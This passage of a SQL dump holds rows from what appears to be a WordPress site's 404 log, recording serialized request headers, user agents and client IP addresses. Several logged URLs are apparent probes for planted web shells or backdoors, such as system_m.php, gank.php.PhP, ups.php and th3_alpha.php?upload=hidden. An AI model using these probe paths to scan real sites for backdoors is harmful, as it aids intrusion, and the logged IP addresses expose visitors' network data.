Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631894749.5521490573883056640625;s:12:\"REQUEST_TIME\";i:1631894749;}}','notice','2021-09-17 16:05:51','2021-09-17 16:05:49',72690472,72791248,'https://zphiblgz.org/components/com_banners/models/banner.php',1,0,'185.191.34.215'),(97170,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631893859.29115009307861328125;s:12:\"REQUEST_TIME\";i:1631893859;}}','notice','2021-09-17 15:51:01','2021-09-17 15:50:59',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'92.38.136.69'),(97169,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631891821.927433013916015625;s:12:\"REQUEST_TIME\";i:1631891821;}}','notice','2021-09-17 15:17:04','2021-09-17 15:17:02',72623584,72707320,'http://zphiblgz.org/scholarship/application/',1,0,'161.117.10.233'),(97168,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631877891.9450531005859375;s:12:\"REQUEST_TIME\";i:1631877891;}}','notice','2021-09-17 11:24:54','2021-09-17 11:24:52',72717480,72801216,'http://zphiblgz.org/scholarship/application/',1,0,'46.8.192.243'),(97167,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"10\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631875666.1779730319976806640625;s:12:\"REQUEST_TIME\";i:1631875666;}}','notice','2021-09-17 10:47:48','2021-09-17 10:47:46',72671344,72772136,'https://zphiblgz.org/wp-admin/css/colors/blue/system_m.php',1,0,'185.191.34.215'),(97165,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631862877.125876903533935546875;s:12:\"REQUEST_TIME\";i:1631862877;}}','notice','2021-09-17 07:14:39','2021-09-17 07:14:37',72635456,72719216,'http://zphiblgz.org/gank.php.PhP',1,0,'47.90.42.101'),(97166,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631862881.496737003326416015625;s:12:\"REQUEST_TIME\";i:1631862881;}}','notice','2021-09-17 07:14:42','2021-09-17 07:14:41',72336600,72420360,'http://zphiblgz.org/gank.php.PhP',1,0,'47.90.42.101'),(97164,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.24 Safari/537.36 Edg/83.0.478.18\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631858305.1198279857635498046875;s:12:\"REQUEST_TIME\";i:1631858305;}}','notice','2021-09-17 05:58:27','2021-09-17 05:58:25',72716672,72800408,'http://zphiblgz.org/scholarship/application/',1,0,'188.126.79.29'),(97163,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631855961.2479350566864013671875;s:12:\"REQUEST_TIME\";i:1631855961;}}','notice','2021-09-17 05:19:23','2021-09-17 05:19:21',72631360,72714344,'https://zphiblgz.org/scholarship/application/',1,0,'192.160.102.170'),(97162,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631852212.8540699481964111328125;s:12:\"REQUEST_TIME\";i:1631852212;}}','notice','2021-09-17 04:16:54','2021-09-17 04:16:53',72647576,72731320,'http://zphiblgz.org/ups.php',1,0,'47.89.31.26'),(97161,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631845488.294415950775146484375;s:12:\"REQUEST_TIME\";i:1631845488;}}','notice','2021-09-17 02:24:50','2021-09-17 02:24:48',72613192,72696176,'https://zphiblgz.org/scholarship/application/',1,0,'199.249.230.155'),(97159,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631843368.4471199512481689453125;s:12:\"REQUEST_TIME\";i:1631843368;}}','notice','2021-09-17 01:49:30','2021-09-17 01:49:28',72605384,72689152,'http://zphiblgz.org/application',1,0,'35.175.113.71'),(97160,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4400.8 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631843610.8068230152130126953125;s:12:\"REQUEST_TIME\";i:1631843610;}}','notice','2021-09-17 01:53:32','2021-09-17 01:53:31',72623584,72707320,'http://zphiblgz.org/scholarship/application/',1,0,'176.48.179.50'),(97200,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943967.7198200225830078125;s:12:\"REQUEST_TIME\";i:1631943967;}}','notice','2021-09-18 05:46:09','2021-09-18 05:46:08',72606368,72690224,'http://zphiblgz.org/search-replace-bd/',1,0,'163.172.213.212'),(97198,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943955.163755893707275390625;s:12:\"REQUEST_TIME\";i:1631943955;}}','notice','2021-09-18 05:45:57','2021-09-18 05:45:55',72606200,72690072,'http://zphiblgz.org/searchdb2/',1,0,'163.172.213.212'),(97199,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943961.080718994140625;s:12:\"REQUEST_TIME\";i:1631943961;}}','notice','2021-09-18 05:46:03','2021-09-18 05:46:01',72604768,72688504,'http://zphiblgz.org/searchbd/',1,0,'163.172.213.212'),(97197,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943948.92311000823974609375;s:12:\"REQUEST_TIME\";i:1631943948;}}','notice','2021-09-18 05:45:50','2021-09-18 05:45:49',72606200,72690040,'http://zphiblgz.org/searchdb/',1,0,'163.172.213.212'),(97059,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631643024.518659114837646484375;s:12:\"REQUEST_TIME\";i:1631643024;}}','notice','2021-09-14 18:10:26','2021-09-14 18:10:24',72605416,72689152,'http://zphiblgz.org/scholarship/application/',1,0,'94.198.50.98'),(97060,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631645174.993506908416748046875;s:12:\"REQUEST_TIME\";i:1631645174;}}','notice','2021-09-14 18:46:16','2021-09-14 18:46:15',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'185.244.214.42'),(97061,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631648801.9665119647979736328125;s:12:\"REQUEST_TIME\";i:1631648801;}}','notice','2021-09-14 19:46:44','2021-09-14 19:46:42',72673208,72771768,'https://zphiblgz.org/cache/enarthrosis/th3_alpha.php?upload=hidden',1,0,'185.191.34.215'),(97062,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:99:\"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.2\";s:19:\"HTTP_ACCEPT_CHARSET\";s:32:\"utf-8,windows-1251;q=0.7,*;q=0.6\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:47.0) Gecko/20100101 Firefox/47.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631649634.8118960857391357421875;s:12:\"REQUEST_TIME\";i:1631649634;}}','notice','2021-09-14 20:00:36','2021-09-14 20:00:35',72605328,72689072,'http://zphiblgz.org/contact/',1,0,'23.254.68.55'),(97063,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631651024.915904998779296875;s:12:\"REQUEST_TIME\";i:1631651024;}}','notice','2021-09-14 20:23:46','2021-09-14 20:23:45',72613192,72696176,'https://zphiblgz.org/scholarship/application/',1,0,'198.144.121.93'),(97064,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:9:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631654642.631042003631591796875;s:12:\"REQUEST_TIME\";i:1631654642;}}','notice','2021-09-14 21:24:05','2021-09-14 21:24:02',72715800,72799568,'http://zphiblgz.org/wordpress/',1,0,'207.180.199.176'),(97065,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.0 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631655302.62755107879638671875;s:12:\"REQUEST_TIME\";i:1631655302;}}','notice','2021-09-14 21:35:04','2021-09-14 21:35:03',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.242.11.193'),(97066,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 